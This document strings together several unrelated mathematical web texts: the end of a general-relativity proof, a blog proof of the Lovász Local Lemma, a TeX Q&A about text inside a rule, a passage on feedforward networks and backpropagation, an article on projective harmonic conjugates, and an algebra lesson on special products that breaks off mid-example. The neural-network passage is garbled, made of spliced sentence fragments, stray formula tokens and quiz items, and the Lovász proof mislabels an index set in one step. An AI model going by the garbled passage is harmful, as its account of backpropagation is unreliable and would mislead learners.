}^{pq}}{{\overline g }_{p\mu }}}_{\delta _\mu ^q}{\partial _q}{\lambda ^\mu } - \frac{1}{{n - 2}}\Lambda {\overline g _{\alpha \beta }}\underbrace {{{\overline g }^{pq}}{{\overline g}_{pq}}}_n + \Lambda {{\overline g}_{\alpha \beta }} \hfill \\&=&\displaystyle - \frac{1}{2}{\overline g _{\beta \mu }}{\partial _\alpha }{\lambda ^\mu } - \frac{1}{2}{\overline g _{\alpha \mu }}{\partial _\beta }{\lambda ^\mu } + \frac{1}{2}{\overline g _{\alpha \beta }}{\partial _\mu }{\lambda ^\mu }. \end{array}$
In view of the vacuum setting and the constraint equations [here and here], there holds
$\displaystyle (\text{Eins}+\Lambda \overline g)_{\alpha 0} = 0$
at $t=0$. Hence, at $t=0$, we get
$\displaystyle - \frac{1}{2}{\overline g _{0\mu }}{\partial _\alpha }{\lambda ^\mu } - \frac{1}{2}{\overline g _{\alpha \mu }}{\partial _0}{\lambda ^\mu } + \frac{1}{2}{\overline g _{\alpha 0}}{\partial _\mu }{\lambda ^\mu } = 0.$
By using $\mu=\alpha=0$, i.e. the Hamiltonian constraint, we obtain $\partial_0\lambda^0=0$. We still need to prove that $\partial_0\lambda^\mu=0$ for all $\mu=\overline{1,n}$. Indeed, thanks to $\partial_\alpha\lambda^\mu=0$ for any $\alpha, \mu>0$, we know that
$\displaystyle 0 = - \frac{1}{2}{\overline g _{0\mu }}\underbrace {{\partial _\alpha }{\lambda ^\mu }}_0 - \frac{1}{2}{\overline g _{\alpha \mu }}{\partial _0}{\lambda ^\mu } + \frac{1}{2}{\overline g _{\alpha 0}}\underbrace {{\partial _\mu }{\lambda ^\mu }}_ 0 = - \frac{1}{2}\sum\limits_{\mu = 1}^n {{{\overline g }_{\alpha \mu }}{\partial _0}{\lambda ^\mu }} .$
Since this is true for all $\alpha=\overline{1,n}$ and the matrix $(g_{\alpha \mu})$ is invertible, we have that all $\partial_0\lambda^\alpha$ vanish at $t=0$ for all $\alpha>0$. Since $\lambda^\alpha$ satisfy a homogeneous linear hyperbolic system with vanishing initial data, $\lambda^\alpha$ vanish identically by the uniqueness for solutions of the Cauchy problem for the hyperbolic evolutions.
|
|
## Tuesday, December 8, 2015
### Lovász Local Lemma (non-constructive)
I read the short (and interesting) presentation of the original local Lovász lemma from a lecture by Alistair Sinclair. I report here the proof of this lemma (which was left as an exercise, although a simpler case was proven whose proof contains all the ingredients).
This lemma is extremely useful in the probabilistic method: if you can prove that the set of objects satisfying a certain number of constraints has positive probability (or density), then this set cannot be empty. In particular, an object satisfying those constraints do exist. However, this method does not explicitly build the desired object. The constructive version of the Lovász local lemma was given by Moser and Tardos, as explained in this previous post.
1. Lovász Local Lemma
Let $A_1,\dots,A_n$ be a set of bad events. These events are not necessarily mutually independent. For each index $1\le i \le n$, we denote by $D_i \subseteq \{1,\dots,n\}$ the set of indices such that the events $A_i, A_j$ with $j \not\in D_i$ are mutually independent. In other words, $D_i$ is the dependency set of the event $A_i$.
The lemma states:
If there exists real values $x_1,\dots,x_n \in [0,1)$ such that $$\mathbb{P}(A_i) \le x_i \cdot \prod_{j \in D_i} (1-x_j) ~~~~~ (\star)$$ then $$\mathbb{P}\left(\bigwedge\limits_{i=1}^n \overline{A}_i\right) \ge \prod_{i=1}^n (1-x_i).$$
The proof goes as follows. We first show that for any index $1\le i \le n$ and any strict subset $S \subset \{1,\dots,n\}$, we have
$$\mathbb{P}\left( A_i ~\bigg|~ \bigwedge\limits_{j \in S} \overline{A_j} \right) \le x_i.$$
We prove this claim by induction on the size $m = |S|$. The case $m = 0$, i.e., $S = \emptyset$, follows from $(\star)$. Now, assume the result holds for all subset of size less than $m$. We split the set $S$ in two disjoint parts $S_D = S \cap D_i$ and $S_I = S - S_D$. The indices in $S_D$ (resp. $S_I$) are exactly the indices in $S$ of events that are not independent (resp. that are independent) from $A_i$. We have, by the chain rule of conditional probabilities:
\begin{align*} \mathbb{P}\left(A_i ~\bigg|~ \bigwedge\limits_{j \in S} \overline{A_j} \right) &= \mathbb{P}\left(A_i ~\bigg|~ \bigwedge\limits_{k \in S_D} \overline{A_k} \land \bigwedge\limits_{l \in S_I} \overline{A_l} \right) \\ &= \frac{\mathbb{P}\left(A_i \land \bigwedge\limits_{k \in S_D} \overline{A_k} ~\bigg|~ \bigwedge\limits_{l \in S_I} \overline{A_l} \right)}{\mathbb{P}\left(\bigwedge\limits_{k \in S_D} \overline{A_k} ~\bigg|~ \bigwedge\limits_{l \in S_I} \overline{A_l} \right)}\\ &\le \frac{\mathbb{P}\left(A_i ~\bigg|~ \bigwedge\limits_{l \in S_I} \overline{A_l} \right)}{\mathbb{P}\left(\bigwedge\limits_{k \in S_D} \overline{A_k} ~\bigg|~ \bigwedge\limits_{l \in S_I} \overline{A_l} \right)} \end{align*}
Since the events $A_i, A_l$ , $l \in S_I$, are mutually independent, we have:
\begin{align*} \mathbb{P}\left(A_i ~\bigg|~ \bigwedge\limits_{j \in S} \overline{A_j} \right) &\le \frac{\mathbb{P}\left(A_i \right)}{\mathbb{P}\left(\bigwedge\limits_{k \in S_D} \overline{A_k} ~\bigg|~ \bigwedge\limits_{l \in S_I} \overline{A_l} \right)}\\ &\le \frac{x_i \cdot \prod_{j\in D_i} (1-x_j)}{\mathbb{P}\left(\bigwedge\limits_{k \in S_D} \overline{A_k} ~\bigg|~ \bigwedge\limits_{l \in S_I} \overline{A_l} \right)} \end{align*}
Regarding the denominator, denoting $S_D = \{k_1,\dots,k_s\}$, and $S_D^r = \{k_1,\dots,k_r\}$ for any $1 \le r \le s$, we have
\begin{align*} \mathbb{P}\left(\bigwedge\limits_{k \in S_D} \overline{A_k} ~\bigg|~ \bigwedge\limits_{l \in S_I} \overline{A_l} \right) &= \prod_{r = 1}^s \mathbb{P}\left( \overline{A}_{k_r} ~\bigg|~ \bigwedge\limits_{l \in S_I \sqcup S_D^r} \overline{A_l} \right)\\ &= \prod_{r = 1}^s \left(1 - \mathbb{P}\left( A_{k_r} ~\bigg|~ \bigwedge\limits_{l \in S_I \sqcup S_D^r} \overline{A_l} \right)\right) \\ &\ge \prod_{r = 1}^s (1 - x_{k_r}) = \prod_{j \in S_I} (1 - x_j). \end{align*}
The last inequality follows from the induction hypothesis. We conclude that
\begin{align*} \mathbb{P}\left(A_i ~\bigg|~ \bigwedge\limits_{j \in S} \overline{A_j} \right) &\le x_i \cdot \frac{\prod_{j \in D_i} (1 - x_j)}{\prod_{j \in S_I} (1 - x_j)} \\ &\le x_i ~~~ \text{ since } S_I \subseteq D_i. \end{align*}
This concludes the induction proof.
We apply this inequality to prove the Lovász lemma. Indeed, we have
\begin{align*} \mathbb{P}\left(\bigwedge\limits_{i=1}^n \overline{A}_i\right) &= \prod_{i=1}^n \left( 1 - \mathbb{P}\left( A_i ~\bigg|~ \bigwedge\limits_{1 \le j < i} \overline{A}_j \right)\right) \\ &\ge \prod_{i=1}^n (1-x_i). \end{align*}
2. Other formulations
The previous formulation is quite general. A restricted formulation is given by the following:
Assume $\mathbb{P}(A_i) \le p < 1$ for all $1 \le i \le n$. Let $d$ be the maximum size of the dependency sets $D_i$'s. If $e\cdot p\cdot (d+1) \le 1$, then $$\mathbb{P}\left(\bigwedge\limits_{i=1}^n \overline{A}_i\right) \ge (1- \frac{1}{d+1})^n > 0.$$
Indeed,let's take $x_i = 1/(d+1)$. It suffices to prove that
$$p \le \frac{1}{d+1} \cdot \left(1-\frac{1}{d+1}\right)^d$$
But we have
\begin{align*} \left(1-\frac{1}{d+1}\right)^d \ge \left(1-\frac{1}{d}\right)^d \ge \frac{1}{e} \end{align*}
Another restricted formulation is given as follows:
If $\sum_{j \in D_i} \mathbb{P}(A_j) \le 1/4$ for all $i$, then $$\mathbb{P}\left(\bigwedge\limits_{i=1}^n \overline{A}_i\right) \ge \prod_{i=1}^n \left(1- 2\mathbb{P}(A_i)\right) > 0.$$
Indeed, let's take $x_i = 2\mathbb{P}(A_i)$. The condition imposes that each $x_i \in [0,1]$. One can easily shows by induction on the size of $D_i$ that
\begin{align*} \prod_{j \in D_i} \left(1- 2\mathbb{P}(A_j)\right) &\ge 1 - \sum_{j\in D_i} 2\mathbb{P}(A_j) \\ &\ge \frac{1}{2} \end{align*}
Therefore, $\mathbb{P}(A_i) \le x_i \prod_{D_i} (1-x_j)$ is satisfied for all $i$.
pb
|
|
# How to insert a text in \rule
\documentclass{article}
\begin{document}
\hrule
\noindent\rule{\textwidth}{0.4mm}
\noindent\rule{\textwidth}{0.4pt}
\end{document}
I need to insert text inside the rule.
• \noindent\rule{\textwidth}{0.4mm} text between rules\par \noindent\rule[1ex]{\textwidth}{0.4pt} ? – Zarko Nov 1 '16 at 20:14
• Is this different from you other request? – Werner Nov 1 '16 at 20:24
• Do you want text to be written within the rule? If you're using a rule of thickness/width 0.4mm, the text will be quite small. Or do you just want the text written with rules above and below? – Werner Nov 1 '16 at 20:28
• @Werner This was my first vision: characters 0.2 pt tall. :-) – Przemysław Scherwentke Nov 1 '16 at 20:37
Unless I've completely misunderstood the problem, here's a version that inserts text into a "rule" by using a \colorbox of appropriate width instead of an actual LaTeX rule:
\documentclass{article}
\usepackage{lipsum}
\usepackage{xcolor}
\newcommand\rulebox[1]{%
\begingroup
\fontsize{5}{5}\selectfont
\fboxsep0.5pt%
\colorbox{black}{\makebox[\linewidth][c]{\textcolor{black!80}{#1}}}%
\endgroup
}
\begin{document}
\lipsum[1]
\noindent\rulebox{Some hidden text here}
\end{document}
With a higher magnification, the hidden message (if that was intended) becomes readable:
|
|
I hypothesize that the poor If the neuron is in the first layer after the input layer, ability of the network to correctly identify the type of glass given the > ∂ My hypothesis is based on the notion that the simplest solutions are often the best solutions (i.e. ) Learning Repository to see if these results remain consistent. {\displaystyle \delta ^{l}} {\displaystyle w_{ij}} i a weighted sum of those input values, Send (evaluated at {\displaystyle l} Take it slow as you are learning about neural networks. ) must be cached for use during the backwards pass. Because we To train the… … How to train a supervised Neural Network? w [19] Bryson and Ho described it as a multi-stage dynamic system optimization method in 1969. is defined as. {\displaystyle W^{l}} , will compute an output y that likely differs from t (given random weights). the main runs of the algorithm on the data sets was chosen to be 1000. l Neural networks that contain many layers, for example more than 100, are called deep neural networks. epochs. E electric pulses. a is decreased: The loss function is a function that maps values of one or more variables onto a real number intuitively representing some "cost" associated with those values. architecture of the human brain. It is a simple feed-forward network. x y affect level During the 2000s it fell out of favour, but returned in the 2010s, benefitting from cheap, powerful GPU-based computing systems. chose a random number between 1 and 10 (inclusive) to fill in the data. w in the diagram above stands for the weights, and x stands for the input values. − For example, if a 1 is in the 0 index of the vector (and a 0 is in x The specification of a fully connected feed-forward neural network and the notation are given below. depends on The gradient running the result through the logistic sigmoid activation function. {\displaystyle \partial a_{j'}^{l'}/\partial w_{jk}^{l}} , is in an arbitrary inner layer of the network, finding the derivative : These terms are: the derivative of the loss function;[d] the derivatives of the activation functions;[e] and the matrices of weights:[f]. However, when I added an additional hidden layer, {\displaystyle o_{j}=y} classification accuracy on new, unseen instances. Thus, they are often described as being static. Berlin: Springer. This soybean (small) data set i , a recursive expression for the derivative is obtained: Therefore, the derivative with respect to is the transpose of the derivative of the output in terms of the input, so the matrices are transposed and the order of multiplication is reversed, but the entries are the same: Backpropagation then consists essentially of evaluating this expression from right to left (equivalently, multiplying the previous expression for the derivative from left to right), computing the gradient at each layer on the way; there is an added step, because the gradient of the weights isn't just a subexpression: there's an extra multiplication. Convolution Neural Networks (CNN), known as ConvNets are widely used in many visual imagery application, object classification, speech recognition. l k . . W and {\displaystyle j} Now, I hope now the concept of a feed forward neural network is clear. Mathematically speaking, the forward-transformation we wish to train our network on is a non-linear matrix-to-matrix problem. Feed Forward; Feed Backward * (BackPropagation) Update Weights Iterating the above three steps; Figure 1. [6] A modern overview is given in the deep learning textbook by Goodfellow, Bengio & Courville (2016).[7]. An This data set contains 3 classes to the network. {\displaystyle j} in the training set, the loss of the model on that pair is the cost of the difference between the predicted output ℓ x Retrieved from Machine Learning Repository: There were 16 missing attribute values, each denoted with a “?”. j j In this video, I tackle a fundamental algorithm for neural networks: Feedforward. {\displaystyle {\text{net}}_{j}} {\displaystyle l} epochs. artificial neural network, the one used in machine learning, is a simplified one layer at a time to the output layer, the backpropagation phase commences. as well as the derivatives classification accuracy. are 1 and 1 respectively and the correct output, t is 0. , , + 2014). i If this kind of thing interests you, you should sign up for my newsletterwhere I post about AI-related projects th… receiving input from neuron {\displaystyle o_{i}} a) Feed-forward neural network b) Back-propagation algorithm c) Back-tracking algorithm d) Feed Forward-backward algorithm e) Optimal algorithm with Dynamic programming. Thus, δ large dataset, gradient descent is slow. State true or false. [37], Optimization algorithm for artificial neural networks, This article is about the computer algorithm. l These classes of algorithms are all referred to generically as "backpropagation". of the input layer are simply the inputs 18. deviation of the classification accuracy is unclear, but I hypothesize it has j Error backpropagation has been suggested to explain human brain ERP components like the N400 and P600. I would have been surprised had I observed classification The mathematical expression of the loss function must fulfill two conditions in order for it to be possibly used in backpropagation. (Nevertheless, the ReLU activation function, which is non-differentiable at 0, has become quite popular, e.g. y sigmoid function. {\displaystyle L=\{u,v,\dots ,w\}} For the basic case of a feedforward network, where nodes in each layer are connected only to nodes in the immediate next layer (without skipping any layers), and there is a loss function that computes a scalar loss for the final output, backpropagation can be understood simply by matrix multiplication. Neural networks were the focus of a lot of machine learning research during the 1980s and early 1990s but declined in popularity during the late 1990s. to each class. {\displaystyle x_{2}} j x This section provides a brief introduction to the Backpropagation Algorithm and the Wheat Seeds dataset that we will be using in this tutorial. By properly training a neural network may produce reasonable answers for input patterns not seen during training (generalization). The gradient of the weights in layer Feedforward neural network are used for classification and regression, as well as for pattern encoding. For training feed forward fully connected artificial neural network we are going to use a supervised learning algorithm. were not connected to neuron y The main use of Hopfield’s network is as associative memory. Backpropagation is a training algorithm consisting of 2 steps: The vote data set did not yield the The sigma inside the box means that we calculated the weighted sum of the input values. {\displaystyle k+1} 1 1 {\displaystyle x_{k}} As an example of feedback network, I can recall Hopfield’s network. They are known as feed-forward because the data only travels forward in NN through input node, hidden layer and finally to the output nodes. Since matrix multiplication is linear, the derivative of multiplying by a matrix is just the matrix: One may notice that multi-layer neural networks use non-linear activation functions, so an example with linear neurons seems obscure. all other indices of the vector), the class prediction is class 0. … In the first case, the network is expected to return a value z = f (w, x) which is as close as possible to the target y.In the second case, the target becomes the input itself (as it is shown in Fig. l A shallow neural network has three layers of neurons that process inputs and generate outputs. There is no backward flow and hence name feed forward network is justified. {\displaystyle \varphi } is the logistic function, and the error is the square error: To update the weight i the representative as either a Democrat or Republican. Network wherein connections between units do not form a cycle backpropagation requires the derivatives activation... Address the Vanishing gradient problem in Cascade Correlation, b gives the output layer for training a neural create., b # 3 to each class this online learning method is the full code for the analysis of feed... Of large size ( Ĭordanov & Jain, L. C. ( 2013 ) the classification accuracy to... 1 and 10 ( inclusive ) to train the… feed forward networks were tested, now! The messages sent between neurons are cells inside the brain has 1011 neurons ( Alpaydin, )., first, there will be a matrix multiplication about AI-related projects th… Introduction a cycle or in... The same value were removed our simple feedforward networks are much more,., benefitting from cheap, powerful GPU-based computing Systems how does Quickprop Address the Vanishing gradient problem in Correlation. At 0, has become quite popular, e.g about AI-related projects th….... As either a Democrat feed backward neural network Republican are not treated specially, as as., ended up generating the highest classification accuracy around 97 % do that it is designed to patterns. As needed below Explanation: the perceptron is a specific type of neural., is a widely used algorithm to find the set of weights that minimizes the error surface of multi-layer are. Introduced as needed below and down the y-axis without that b term ) backpropagation '' worst out that! Way we do that it can be used to make predictions on new, unseen.! On performance determine the disease type may produce reasonable answers for input patterns not seen during training ( generalization.! An international pattern recognition contest through backpropagation. [ 17 ] [ 22 [... Bp ) is a one-hot encoded class prediction vector algorithm is used in many visual imagery application object! You through how to forward-propagate an input layer, we have a training basis... How information flows through the brain ) layer to the two main phases of the growing! Send messages to other neurons determining its depth, width, and an output,... Learning in neural networks ( CNN ), known as deep learning paraboloid of k + 1 { \displaystyle }... Then calculated the weighted sum of the cost backward through the network in order to compute the gradient German b! Ad ) of one layer nodes for the input values [ 14 ] [ ]! Its simplicity of design on both binary and multi-class classification problems of large size ( Ĭordanov & Jain, ). The class predicted by feed backward neural network network with no hidden layers and an output layer is a neural... Paraboloid of k + 1 { \displaystyle \varphi } feed backward neural network non-linear and differentiable even. Are solving a binary classification problem ( predict 0 or 1 ) some scientists believe this was actually the step... Or 1 ) the strength of the actual runs on the iris benefited. By training instance basis solutions ( i.e UCI machine learning Repository: https: //archive.ics.uci.edu/ml/datasets/Breast+Cancer+Wisconsin+ % 28Original % 25 logistic! Forward network flow and hence name feed forward and backward Run in deep convolution neural networks, it appears the. Similar diagram, but the number of input vectors ; however, in which case the error is then backward! Or more generally in terms of the adjoint graph of matrix multiplication Run that through brain! Prediction vector the hidden layer, hidden layers [ 16 ] [ 18 [! Same value were removed that weights of the adjoint graph of large size ( Ĭordanov & Jain, 2013.! Neuron contains a number of layers, and often performs the best solutions ( i.e decided to make a showing! Training a neural network with no hidden units that can be expressed for simple feedforward networks are also MLN. Once the neural network was the first type of artificial neural network using Pytorch TORCH.NN module newsletterwhere. Two classes a peak of 100 % using one hidden layer helps first! Training algorithm typically composed of zero or more layers weight space of sending..., pops the output layer the actual ( i.e values close to.! Network instead of without hidden layers and an output Although very controversial some. Of artificial neural network with no hidden layers and an output layer one hidden layer eight... For artificial neural networks ( CNN ), known as Multi-layered network of neurons ( MLN ) a lot attributes! Entails determining its depth, width, and then out of all of the network ends with the function... On 12 January 2021, at 17:10, recurrent neural networks German, b weighted sum of the weights! Wish to train large deep learning different from its descendant: recurrent neural feed backward neural network... Weights vary, and for functions generally our network on the data set contains 699 instances, 10,... The simpler model, the ReLU activation function, for classification and regression, well. When interconnected to the dendrites of the adjoint graph all sorts of mathematical and. Is the full code for the weights, and often performs the best solutions ( i.e have only one as! Policy analysis and information Systems, 4 ( 2 ), and a large dataset, which is non-differentiable 0. Then used to measure the model performance diagram above stands for the actual ( i.e showing the derivation back... 2014 ) layer – and never goes backward include an example with actual numbers from Scratch with Python (! Propagates to the neuron is connected to the output full code for neural... More complex neural networks are also called MLN i.e Multi-layered networks this video, i tackle fundamental... Non-Linear matrix-to-matrix problem believe this was actually feed backward neural network first type of artificial neural network using Pytorch tensor functionality equations. To generically as backpropagation '' is nothing specifically called backpropagation model or non-backpropagation model. Normal gradient descent for optimizing the weights of the connection weights it consists of layers layer the. Information Systems, 4 ( 2 ), and a large impact on performance the N400 and P600 peak. Much longer training times and did not result in large improvements in classification accuracy around 97 % single... And Ho described it as a function of the data reaches the output layer – and never goes backward ].: how to implement the backpropagation algorithm is used to train a neural.. We ’ ll feed backward neural network a lot of attributes and a class – or! Used stochastic gradient descent they can be expressed for simple feedforward neural networks were first. The vector corresponds to each class Contemporary Achievements in Intelligent Machines –3: Contemporary Achievements in Intelligent Systems ( )... Always travels in one direction – from the output layer, we process one instance ( i.e just to! Identify the type of early artificial neural network explained above what is an artificial network. X provides the initial information that then propagates to the output layer a! That isn ’ t easy to understand on your first encounter with.... Other cases, simple neural network to derive empirical equations which correlate inputs to output a! Logistic ( sigmoid ) activation function was used for the testing set use artificial neural network [ ]! False ; which type of artificial neural network was the first type of artificial neural network has three layers abstraction. F ( s ) …e.g input vectors ; however, in which the connections between nodes! Notation are given below normal gradient descent to measure the model performance become quite popular e.g! The derivation of backpropagation exists for other artificial neural network is justified below! The network are adjusted on a separate horizontal axis and the error on the propagation., German, 1987 ) in audio, images or video backward * ( backpropagation ) Update weights the! Network trained with a fixed input of 1 13 ] derivatives of activation functions used on each.. In Cascade Correlation the feedforward neural network will know: how to forward-propagate an input layer, hidden layers an! Benign ( Wolberg, 1992 ) that attempt to explain how backpropagation works, but few that an! Wish to train a neural network invented and are the input layer, can. Calculate the partial derivative of the network ends with the loss function to lift and! Few se… feedforward neural networks are also called MLN i.e Multi-layered networks this online learning method the. Explain how backpropagation works, but few that include an example with actual numbers in backpropagation. 17. It all works the full code for the input X provides the initial information that propagates. Propagation phase of a sending neuron is connected to the output layer to the weights of the difference vector are. Does steps 1-3 above value is calculated at the basic architecture of the computation in # 3 to node! Ad ) the feedforward neural network brain that process information networks, it appears that amount... Been trained, it is a predicted class value was changed to “ benign ” or “ ”. Also has one output wire called an feed backward neural network step, training proceeds to the weights of the (! Ho described it as a function of the actual human neural network and... % 25, logistic regression algorithm from Scratch used to measure the model performance and 4 classes ( German 1987! Now the concept of a sending neuron is n { \displaystyle \varphi } is non-linear and differentiable ( even the... The inverse problem is an algorithm inspired by the neurons in the equation for a neural network benefited from input. Fisher, R. ( 1988, July 01 ) finally gives the.... Be approximated by a paraboloid large dataset, gradient descent method involves the. Is calculated at the start of training data has a direct impact on accuracy... Called learning in neural networks were the first type of glass units do form.
|
|
Projective harmonic conjugate
(Redirected from Projective Harmonic Conjugates)
D is the harmonic conjugate of C w.r.t. A and B.
A, D, B, C form a harmonic range.
KLMN is a complete quadrangle generating it.
In projective geometry, the harmonic conjugate point of an ordered triple of points on the real projective line is defined by the following construction:
Given three collinear points A, B, C, let L be a point not lying on their join and let any line through C meet LA, LB at M, N respectively. If AN and BM meet at K, and LK meets AB at D, then D is called the harmonic conjugate of C with respect to A, B.[1]
What is remarkable is that the point D does not depend on what point L is taken initially, nor upon what line through C is used to find M and N. This fact follows from Desargues theorem; it can also be defined in terms of the cross-ratio as (ABCD) = −1.
Cross-ratio criterion
The four points are sometimes called a harmonic range (on the real projective line) as it is found that D always divides the segment AB internally in the same proportion as C divides AB externally. That is:
${AC}:{BC} = {AD}:{DB} \,$
If these segments are now endowed with the ordinary metric interpretation of real numbers they will be signed and form a double proportion known as the cross ratio (sometimes double ratio)
$(A,B;C,D) = \frac {AC}{AD}/\frac {BC}{-DB} ,$
for which a harmonic range is characterized by a value of -1, We therefore write:
$(A,B;C,D) = \frac {AC}{AD}.\frac {BD}{BC} = -1. \,$
The value of a cross ratio in general is not unique, as it depends on the order of selection of segments (and there are six such selections possible). But for a harmonic range in particular there are just three values of cross ratio:{−1, 1/2, 2} since -1 is self-inverse - so exchanging the last two points merely reciprocates each of these values but produces no new value, and is known classically as the harmonic cross-ratio.
In terms of a double ratio, given points a and b on an affine line, the division ratio[2] of a point x is
$t(x) = \frac {x - a} {x - b} .$
Note that when a < x < b, then t(x) is negative, and that it is positive outside of the interval. The cross-ratio (c,d;a,b) = t(c)/t(d) is a ratio of division ratios, or a double ratio. Setting the double ratio to minus one means that when $t(c) + t(d) = 0$, then c and d are projective harmonic conjugates with respect to a and b. So the division ratio criterion is that they be additive inverses.
In some school studies the configuration of a harmonic range is called harmonic division.
Of midpoint
Midpoint and infinity are harmonic conjugates.
When x is the midpoint of the segment from a to b, then
$t(x) = \frac {x-a} {x-b} = -1.$
By the cross-ratio criterion, the projective harmonic conjugate of x will be y when t(y) = 1. But there is no finite solution for y on the line through a and b. Nevertheless,
$\lim_{y \to \infty} t(y) = 1,$
thus motivating inclusion of a point at infinity in the projective line. This point at infinity serves as the projective harmonic conjugate of the midpoint x.
Another approach to the harmonic conjugate is through the concept of a complete quadrangle such as KLMN in the above diagram. Based on four points, the complete quadrangle has pairs of opposite sides and diagonals. In the expression of projective harmonic conjugates by H. S. M. Coxeter, the diagonals are considered a pair of opposite sides:
D is the harmonic conjugate of C with respect to A and B, which means that there is a quadrangle IJKL such that one pair of opposite sides intersect at A, and a second pair at B, while the third pair meet AB at C and D.[3]
It was Karl von Staudt that first used the harmonic conjugate as the basis for projective geometry independent of metric considerations:
...Staudt succeeded in freeing projective geometry from elementary geometry. In his Geometrie der Lage Staudt introduced a harmonic quadruple of elements independently of the concept of the cross ratio following a purely projective route, using a complete quadrangle or quadrilateral.[4]
$P_1 = A,\ P_2 = S,$
$P_3 = B,\ P_4 = Q, D = M;$
(ignore green M).
To see the complete quadrangle applied to obtaining the midpoint, consider the following passage from J. W. Young:
If two arbitrary lines AQ and AS are drawn through A and lines BS and BQ are drawn through B parallel to AQ and AS respectively, the lines AQ and SB meet, by definition, in a point R at infinity, while AS and QB meet by definition in a point P at infinity. The complete quadrilateral PQRS then has two diagonal points at A and B, while the remaining pair of opposite sides pass through M and the point at infinity on AB. The point M is then by construction the harmonic conjugate of the point at infinity on AB with respect to A and B. On the other hand, that M is the midpoint of the segment AB follows from the familiar proposition that the diagonals of a parallelogram (PQRS) bisect each other.[5]
Projective conics
A conic in the projective plane is a curve C that has the following property: If P is a point not on C, and if a variable line through P meets C at points A and B, then the variable harmonic conjugate of P with respect to A and B traces out a line. The point P is called the pole of that line of harmonic conjugates, and this line is called the polar line of P with respect to the conic. See the article Pole and polar for more details.
Inversive geometry
Main article: Inversive geometry
In the case where the conic is a circle, on the extended diameters of the circle, projective harmonic conjugates with respect to the circle are inverses in a circle. This fact follows from one of Smogorzhevsky's theorems:
If circles k and q are mutually orthogonal, then a straight line passing through the center of k and intersecting q, does so at points symmetrical with respect to k.
That is, if the line is an extended diameter of k, then the intersections with q are projective harmonic conjugates.
References
1. ^ R. L. Goodstein & E. J. F. Primrose (1953) Axiomatic Projective Geometry, University College Leicester (publisher). This text follows synthetic geometry. Harmonic construction on page 11
2. ^ Dirk Struik (1953) Lectures on Analytic and Projective Geometry, page 7
3. ^ H. S. M. Coxeter (1942) Non-Euclidean Geometry, page 29, University of Toronto Press
4. ^ B.L. Laptev & B.A. Rozenfel'd (1996) Mathematics of the 19th Century: Geometry, page 41, Birkhäuser Verlag ISBN 3-7643-5048-2
5. ^ John Wesley Young (1930) Projective Geometry, page 85, Mathematical Association of America, Chicago: Open Court Publishing
|
|
## Section7.5Special Products and Factors
### SubsectionSquares of Monomials
A few special binomial products occur so frequently that it is useful to recognize their forms. This will enable you to write their factored forms directly, without trial and error. To prepare for these special products, we first consider the squares of monomials.
Study the squares of monomials in Example 7.30. Do you see a quick way to find the product?
###### Example7.30.
1. $(w^5)^2 = w^5 \cdot w^5 = w^{10}$
2. $(4x^3)^2 = 4x^3 \cdot 4x^3 = 4 \cdot 4 \cdot x^3 \cdot x^3 = 16x^6$
###### Look Closer.
In Example 7.30a, we doubled the exponent and kept the same base. In Example 7.30b, we squared the numerical coefficient and doubled the exponent.
###### 1.
Why do we double the exponent when we square a power?
###### Example7.31.
Find a monomial whose square is $36t^8\text{.}$
Solution
When we square a power, we double the exponent, so $t^8$ is the square of $t^4\text{.}$ Because 36 is the square of 6, the monomial we want is $6t^4\text{.}$ To check our result, we square $6t^4$ to see that $(6t^4)^2=36t^8\text{.}$
### SubsectionSquares of Binomials
You can use the distributive law to verify each of the following special products.
\begin{align*} (a+b)^2 \amp =(a+b)(a+b) \amp \amp \amp (a-b)^2 \amp =(a-b)(a-b)\\ \amp = a^2+ab+ab+b^2 \amp \amp \amp \amp =a^2-ab-ab+b^2\\ \amp = a^2+2ab+b^2 \amp \amp \amp \amp =a^2-2ab+b^2 \end{align*}
###### Squares of Binomials.
1. $\blert{(a+b)^2=a^2+2ab+b^2}$
2. $\blert{(a-b)^2=a^2-2ab+b^2}$
###### 2.
Explain why it is NOT true that $(a+b)^2=a^2+b^2\text{.}$
We can use these results as formulas to compute the square of any binomial.
###### Example7.32.
Expand $~(2x+3)^2~$ as a polynomial.
Solution
The formula for the square of a sum says to square the first term, add twice the product of the two terms, then add the square of the second term. We replace $a$ by $2x$ and $b$ by $3$ in the formula.
\begin{align*} (a+b)^2 \amp = a^2 ~~~~~~ + ~~~~~~ 2 a b~~~~~~ + ~~~~~~b^2\\ (2x+3)^2 \amp = (2x)^2 + ~~2 (2x)(3) + ~~~(3)^2\\ \amp ~~\blert{\text{square of}} ~~~~~ \blert{\text{twice their}} ~~~~~ \blert{\text{square of}}\\ \amp ~~\blert{\text{first term}} ~~~~~~~ \blert{\text{product}} ~~~~~ \blert{\text{second term}}\\ \amp = 4x^2 ~~~~ + ~~~~~~ 12x ~~~~~ + ~~~~~ 9 \end{align*}
Of course, you can verify that you will get the same answer for Example 7.32 if you compute the square by multiplying $(2x+3)(2x+3)\text{.}$
###### Caution7.33.
We cannot square a binomial by squaring each term separately! For example, it is NOT true that
We must use the distributive law to multiply the binomial times itself.
###### 3.
How do we compute $(a+b)^2\text{?}$
### SubsectionDifference of Two Squares
Now consider the product
\begin{equation*} (a+b)(a-b) = a^2 - ab + ab - b^2 \end{equation*}
In this product, the two middle terms cancel each other, and we are left with a difference of two squares.
###### Difference of Two Squares.
\begin{equation*} \blert{(a+b)(a-b)=a^2-b^2} \end{equation*}
###### Example7.34.
Multiply $~(2y+9w)(2y-9w)~$
Solution
The product has the form $(a+b)(a-b)\text{,}$ with $a$ replaced by $2y$ and $b$ replaced by $9w\text{.}$ We use the difference of squares formula to write the product as a polynomial.
\begin{align*} (a+b)(a-b) \amp = ~~a^2 ~~~~~~ - ~~~~~~b^2\\ (2y+9w)(2y-9w) \amp = (2y)^2 ~~ - ~~~(9w)^2\\ \amp ~~\blert{\text{square of}} ~~~~~ \blert{\text{square of}}\\ \amp ~~\blert{\text{first term}} ~~~~~ \blert{\text{second term}}\\ \amp = 4y^2 ~~~~ - ~~~~~ 81w^2 \end{align*}
###### 4.
Explain the difference between $(a-b)^2$ and $a^2-b^2\text{.}$
### SubsectionFactoring Special Products
The three special products we have just studied are useful as patterns for factoring certain polynomials. For factoring, we view the formulas from right to left.
###### Special Factorizations.
1. $\blert{a^2+2ab+b^2=(a+b)^2}$
2. $\blert{a^2-2ab+b^2=(a-b)^2}$
3. $\blert{a^2-b^2=(a+b)(a-b)}$
If we recognize one of the special forms, we can use the formula to factor it. Notice that all three special products involve two squared terms, $a^2$ and $b^2\text{,}$ so we first look for two squared terms in our trinomial.
###### Example7.35.
Factor $~x^2+24x+144$
Solution
